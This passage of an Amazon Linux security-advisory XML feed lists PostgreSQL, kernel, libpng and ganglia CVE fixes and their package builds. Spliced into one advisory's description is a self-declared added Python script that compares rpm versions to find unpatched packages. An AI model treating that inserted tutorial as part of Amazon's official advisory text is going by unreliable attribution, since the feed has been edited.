release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-sysinit-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-pkcs11-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-pkcs11-devel-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="nss-devel" version="3.19.1" release="7.74.amzn1" epoch="0" arch="i686"><filename>Packages/nss-devel-3.19.1-7.74.amzn1.i686.rpm</filename></package><package name="jss-debuginfo" version="4.2.6" release="35.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/jss-debuginfo-4.2.6-35.17.amzn1.x86_64.rpm</filename></package><package name="jss" version="4.2.6" release="35.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/jss-4.2.6-35.17.amzn1.x86_64.rpm</filename></package><package name="jss-javadoc" version="4.2.6" release="35.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/jss-javadoc-4.2.6-35.17.amzn1.x86_64.rpm</filename></package><package name="jss" version="4.2.6" release="35.17.amzn1" epoch="0" arch="i686"><filename>Packages/jss-4.2.6-35.17.amzn1.i686.rpm</filename></package><package name="jss-javadoc" version="4.2.6" release="35.17.amzn1" epoch="0" arch="i686"><filename>Packages/jss-javadoc-4.2.6-35.17.amzn1.i686.rpm</filename></package><package name="jss-debuginfo" version="4.2.6" release="35.17.amzn1" epoch="0" arch="i686"><filename>Packages/jss-debuginfo-4.2.6-35.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-609</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-609: medium priority package update for postgresql92 postgresql93 postgresql94</title><issued date="2015-11-05 02:14:00" /><updated date="2015-11-05 03:26:00" 
/><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5289:
Multiple stack-based buffer overflows in json parsing in PostgreSQL 9.3.x before 9.3.10 and 9.4.x before 9.4.5 allow attackers to cause a denial of service (server crash) via unspecified vectors, which are not properly handled in (1) json or (2) jsonb values.
1270312:
CVE-2015-5289 postgresql: Json or jsonb input values can cause DoS
CVE-2015-5288:
The crypt function in contrib/pgcrypto in PostgreSQL before 9.0.23, 9.1.x before 9.1.19, 9.2.x before 9.2.14, 9.3.x before 9.3.10, and 9.4.x before 9.4.5 allows attackers to cause a denial of service (server crash) or read arbitrary server memory via a &quot;too-short&quot; salt.
1270306:
CVE-2015-5288 postgresql: A few bytes of memory leak in crypt()
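Each pkglist in this feed records the fixed build as separate epoch, version, release and arch attributes on a package element, and deciding whether a host is still exposed means ordering the installed EVR against the fixed one with RPM's segment rules rather than comparing strings (a string compare would put 34.9 after 34.27). The following Python is an added example, not part of this feed or of yum: it extracts id, severity, CVE ids and fixed packages from an update element, reimplements rpmvercmp's segment ordering (without the tilde and caret rules, which these package versions do not use), and lists installed packages still below the fixed EVR. The sample update is constructed in code to mirror the ALAS-2015-607 ntp entry above and the installed set is made up; pass the path of a real updateinfo.xml as the first argument to run the same check against the whole feed.

```python
import re
import sys
import xml.etree.ElementTree as ET


def _segments(s):
    """Split a version or release into maximal digit runs and letter runs; separators are ignored."""
    return re.findall(r"[0-9]+|[A-Za-z]+", s)


def rpmvercmp(a, b):
    """Return 1, 0 or -1 with rpm's ordering: numeric segments compare as integers,
    alphabetic ones lexically, a numeric segment beats an alphabetic one, and the
    string with segments left over is newer. Tilde/caret handling is omitted."""
    if a == b:
        return 0
    sa, sb = _segments(a), _segments(b)
    for x, y in zip(sa, sb):
        if x.isdigit() and y.isdigit():
            xi, yi = int(x), int(y)
            if xi != yi:
                return 1 if xi > yi else -1
        elif x.isdigit():
            return 1
        elif y.isdigit():
            return -1
        elif x != y:
            return 1 if x > y else -1
    if len(sa) == len(sb):
        return 0
    return 1 if len(sa) > len(sb) else -1


def _epoch(e):
    """rpm -qa prints (none) for a missing epoch; the feed uses an explicit 0."""
    return 0 if e in (None, "", "(none)") else int(e)


def compare_evr(x, y):
    """x and y are (epoch, version, release) string tuples; epoch dominates."""
    ex, ey = _epoch(x[0]), _epoch(y[0])
    if ex != ey:
        return 1 if ex > ey else -1
    c = rpmvercmp(x[1], y[1])
    return c if c != 0 else rpmvercmp(x[2], y[2])


def parse_update(update):
    """Pull id, severity, CVE ids and fixed (name, arch) to EVR out of one update element."""
    cves = [r.get("id") for r in update.iter("reference") if r.get("type") == "cve"]
    pkgs = {}
    for p in update.iter("package"):
        pkgs[(p.get("name"), p.get("arch"))] = (p.get("epoch", "0"), p.get("version"), p.get("release"))
    return {"id": update.findtext("id"), "severity": update.findtext("severity"),
            "cves": cves, "packages": pkgs}


def find_unpatched(advisory, installed):
    """installed maps (name, arch) to the installed EVR; returns the packages still older than the fix."""
    out = []
    for key, fixed in advisory["packages"].items():
        have = installed.get(key)
        if have is not None and 0 > compare_evr(have, fixed):
            out.append((key, have, fixed))
    return out


def sample_update():
    """Constructed in code to mirror the ALAS-2015-607 entry; not read from the feed."""
    u = ET.Element("update", type="security")
    ET.SubElement(u, "id").text = "ALAS-2015-607"
    ET.SubElement(u, "severity").text = "important"
    refs = ET.SubElement(u, "references")
    for cve in ("CVE-2015-7704", "CVE-2015-7871"):
        ET.SubElement(refs, "reference", id=cve, type="cve")
    coll = ET.SubElement(ET.SubElement(u, "pkglist"), "collection", short="amazon-linux-ami")
    for name in ("ntp", "ntpdate"):
        ET.SubElement(coll, "package", name=name, epoch="0", version="4.2.6p5",
                      release="34.27.amzn1", arch="x86_64")
    return u


def sample_installed():
    """Made-up installed set: ntp one release behind the fix, ntpdate already at it."""
    return {("ntp", "x86_64"): ("(none)", "4.2.6p5", "34.26.amzn1"),
            ("ntpdate", "x86_64"): ("0", "4.2.6p5", "34.27.amzn1")}


def main(argv):
    updates = [sample_update()]
    if len(argv) > 1:
        updates = list(ET.parse(argv[1]).getroot().iter("update"))
    for upd in updates:
        adv = parse_update(upd)
        for key, have, fixed in find_unpatched(adv, sample_installed()):
            print(adv["id"], adv["severity"], key[0], key[1], "installed", "-".join(have),
                  "fixed", "-".join(fixed), " ".join(adv["cves"]))


if __name__ == "__main__":
    main(sys.argv)
```

To check a real host, replace sample_installed with the output of rpm -qa formatted as name, arch, epoch, version, release per line; epoch must be compared as a number, which is why the java-1.8.0-openjdk entries above (epoch 1) would outrank any epoch-0 build regardless of version.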
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5288" title="" id="CVE-2015-5288" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5289" title="" id="CVE-2015-5289" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="postgresql92-test" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-test-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-contrib" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-contrib-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-devel" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-devel-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plperl-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-debuginfo-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-plpython27-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.14" release="1.56.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql92-plpython26-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-pltcl-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-docs" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-docs-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-server-compat-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-libs" version="9.2.14" release="1.56.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql92-libs-9.2.14-1.56.amzn1.x86_64.rpm</filename></package><package name="postgresql92-plperl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plperl-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-server" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython26" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython26-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-debuginfo" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-debuginfo-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-docs" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-docs-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-libs" version="9.2.14" 
release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-libs-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-test" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-test-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-devel" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-devel-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-server-compat" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-server-compat-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-plpython27" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-plpython27-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-contrib" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-contrib-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql92-pltcl" version="9.2.14" release="1.56.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql92-pltcl-9.2.14-1.56.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plperl-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython27-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-pltcl-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-test" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-test-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package 
name="postgresql93" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-contrib" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-contrib-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-devel" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-devel-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-server" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-server-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-plpython26-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-libs-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-debuginfo-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-docs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql93-docs-9.3.10-1.60.amzn1.x86_64.rpm</filename></package><package name="postgresql93-libs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-libs-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython26" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plpython26-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-plpython27" version="9.3.10" release="1.60.amzn1" epoch="0" 
arch="i686"><filename>Packages/postgresql93-plpython27-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-docs" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-docs-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-contrib" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-contrib-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-devel" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-devel-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-test" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-test-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-pltcl" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-pltcl-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-plperl" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-plperl-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-server" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-server-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql93-debuginfo" version="9.3.10" release="1.60.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql93-debuginfo-9.3.10-1.60.amzn1.i686.rpm</filename></package><package name="postgresql94-libs" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-libs-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-test" version="9.4.5" release="1.63.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/postgresql94-test-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-pltcl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-pltcl-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-contrib" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-contrib-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython26-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-devel" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-devel-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-server" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-server-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-docs" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-docs-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plpython27-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-plperl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-plperl-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.5" release="1.63.amzn1" epoch="0" arch="x86_64"><filename>Packages/postgresql94-debuginfo-9.4.5-1.63.amzn1.x86_64.rpm</filename></package><package name="postgresql94-libs" version="9.4.5" 
release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-libs-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-devel" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-devel-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-test" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-test-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-docs" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-docs-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-server" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-server-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-pltcl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-pltcl-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-plperl" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plperl-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython26" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-plpython26-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-debuginfo" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-debuginfo-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-contrib" version="9.4.5" release="1.63.amzn1" epoch="0" arch="i686"><filename>Packages/postgresql94-contrib-9.4.5-1.63.amzn1.i686.rpm</filename></package><package name="postgresql94-plpython27" version="9.4.5" release="1.63.amzn1" 
epoch="0" arch="i686"><filename>Packages/postgresql94-plpython27-9.4.5-1.63.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-610</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-610: medium priority package update for kernel</title><issued date="2015-11-23 13:41:00" /><updated date="2015-11-23 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7872:
A denial of service vulnerability was discovered in the keyring function&#039;s garbage collector in the Linux kernel. The flaw allowed any local user account to trigger a kernel panic.
1272371:
CVE-2015-7872 kernel: Keyrings crash triggerable by unprivileged user
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7872" title="" id="CVE-2015-7872" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.1.13" release="18.26.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/perf-4.1.13-18.26.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="perf" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.1.13" release="18.26.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.1.13-18.26.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.1.13" release="18.26.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.1.13-18.26.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-611</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-611: medium priority package update for libpng</title><issued date="2015-11-23 13:43:00" /><updated date="2015-11-23 22:53:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8126:
Multiple buffer overflows in the (1) png_set_PLTE and (2) png_get_PLTE functions in libpng before 1.0.64, 1.1.x and 1.2.x before 1.2.54, 1.3.x and 1.4.x before 1.4.17, 1.5.x before 1.5.24, and 1.6.x before 1.6.19 allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via a small bit-depth value in an IHDR (aka image header) chunk in a PNG image.
1281756:
CVE-2015-8126 libpng: Buffer overflow vulnerabilities in png_get_PLTE/png_set_PLTE functions
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8126" title="" id="CVE-2015-8126" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libpng-devel" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-devel-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-static-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.13.amzn1" epoch="2" arch="x86_64"><filename>Packages/libpng-debuginfo-1.2.49-1.13.amzn1.x86_64.rpm</filename></package><package name="libpng-static" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-static-1.2.49-1.13.amzn1.i686.rpm</filename></package><package name="libpng-debuginfo" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-debuginfo-1.2.49-1.13.amzn1.i686.rpm</filename></package><package name="libpng-devel" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-devel-1.2.49-1.13.amzn1.i686.rpm</filename></package><package name="libpng" version="1.2.49" release="1.13.amzn1" epoch="2" arch="i686"><filename>Packages/libpng-1.2.49-1.13.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-612</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-612: important priority package update for ganglia</title><issued date="2015-11-23 13:44:00" /><updated date="2015-11-23 22:51:00" /><severity>important</severity><description>Package updates 
are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-6816:
1260562:
CVE-2015-6816 ganglia: Bypassing Ganglia-web auth using boolean serialization
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-6816" title="" id="CVE-2015-6816" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ganglia-web" version="3.7.1" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-web-3.7.1-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-devel" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-devel-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmond-python" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-python-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-debuginfo" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-debuginfo-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmetad" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmetad-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmond" version="3.7.2" release="2.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/ganglia-gmond-3.7.2-2.19.amzn1.x86_64.rpm</filename></package><package name="ganglia-gmetad" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmetad-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-gmond" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-gmond-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-devel" version="3.7.2" release="2.19.amzn1" epoch="0" arch="i686"><filename>Packages/ganglia-devel-3.7.2-2.19.amzn1.i686.rpm</filename></package><package name="ganglia-gmond-python" 
